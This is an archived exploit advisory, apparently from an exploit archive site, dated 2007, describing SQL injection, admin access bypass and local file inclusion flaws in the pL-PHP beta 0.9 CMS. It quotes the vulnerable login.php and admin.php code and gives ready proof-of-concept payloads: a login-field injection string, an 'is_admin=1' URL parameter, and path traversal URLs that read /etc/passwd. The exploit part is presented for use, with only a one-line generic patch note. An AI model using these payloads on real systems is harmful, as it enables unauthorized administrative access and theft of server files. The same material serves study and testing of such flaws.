what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

plphp-multi.txt

plphp-multi.txt
Posted Apr 11, 2007
Authored by Omnipresent

pL-PHP beta version 0.9 suffers from SQL injection, administrative bypass, and local file inclusion vulnerabilities.

tags | exploit, local, php, vulnerability, sql injection, file inclusion
SHA-256 | 55781adadecc25967793eb70dfce2465b352aec8c5eb04c30ed289f92567a30e

plphp-multi.txt

Change Mirror Download
   .      .        .  
._ | _. .|_ _. _.;_/
[_)|(_]\_|[ )(_](_.| \.net
| ._|
"pL-PHP beta 0.9 - MULTIPLE VULNERABILITIES"
by Omni

1) Infos
---------
Date : 2007-04-10
Product : pL-PHP
Version : beta 0.9 - Prior version maybe also be affected
Vendor : http://sourceforge.net/projects/pl-php/ - http://www.karlcore.com/programming/blog/
Vendor Status : 2007-04-10 -> Not Informed!

Description : pL-PHP is a new PHP Portal or Content Management System (CMS). It is based on a "multi-topics" system,
with sub-topics, and all the content (downloads, articles, headers, links...) is shared into these topics
and sub-topics. It will be very easy to use.

Source : omnipresent - omni
E-mail : omnipresent[at]email[dot]it - omni[at]playhack[dot]net
Team : Playhack.net Security

2) Security Issues
-------------------
--- [ SQL Injection - Admin Access Bypass ] ---
===============================================

[login.php Source Code Bugged - Line 10 - 20]

require("includes/config.php");

// Authentification
// Script inspir par DBprotect 1.0 de David Borrat (david@borrat.net)
if (isset($_POST['login'])) {
$login = $_POST['login'];
$pass = md5($_POST['pass']);

$sql = mysql_connect($global['sql_host'], $global['sql_user'], $global['sql_pass']);
mysql_select_db($global['sql_base'], $sql);
$verif_query = sprintf("SELECT * FROM " . $global['prefix'] . "_users WHERE username='$login' AND user_password='$pass'");

[end login.php Source Code]

As we can see the variables $login and $pass are not properly sanitized before being used; so is possibile to exploit this vulnerability remotely.

[ PoC ]
=======

Just run with your browser to login.php and insert in the login field: 1' OR '1' = '1' # and in the pass filed what you want! Now you have Admin credential!

--- [Global Variable problem - Admin Access Bypass ] ---
========================================================

[admin.php Source Code Bugged - Line 14]

[...]

if($is_admin == 1)

[...]

[end admin.php Source Code]

As we can se, via the browser we can just connect to admin.php script and pass the variable isadmin the number 1 :D.

[ PoC ]
=======

http://remote_host/[remote_path]/admin.php?is_admin=1

Now you are Admin ;)

--- [Local File Inclusion ] ---
===============================

[admin.php Source Code Bugged - Line 16]

[...]

include("admin/lang/" . $lang . ".inc.php");

[...]

[end admin.php Source Code]

As we can se, via the browser we can just connect to admin.php script and pass the variable $lang a pretty good path ;).

[ PoC ]
=======

Connect with Admin Credential and... Have fun..

eg 1:

http://127.0.0.1/files/admin.php?is_admin=1&lang=../../../../../../etc/passwd%00

eg 2:

First you must.. log in as Admin (SQL Injection Method) and then...

http://127.0.0.1/files/admin.php?&lang=../../../../../../etc/passwd%00

3) Patches
-----------

Edit the source code to ensure that the input will be properly sanitized before being used


Login or Register to add favorites

File Archive:

December 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    0 Files
  • 2
    Dec 2nd
    41 Files
  • 3
    Dec 3rd
    0 Files
  • 4
    Dec 4th
    0 Files
  • 5
    Dec 5th
    0 Files
  • 6
    Dec 6th
    0 Files
  • 7
    Dec 7th
    0 Files
  • 8
    Dec 8th
    0 Files
  • 9
    Dec 9th
    0 Files
  • 10
    Dec 10th
    0 Files
  • 11
    Dec 11th
    0 Files
  • 12
    Dec 12th
    0 Files
  • 13
    Dec 13th
    0 Files
  • 14
    Dec 14th
    0 Files
  • 15
    Dec 15th
    0 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close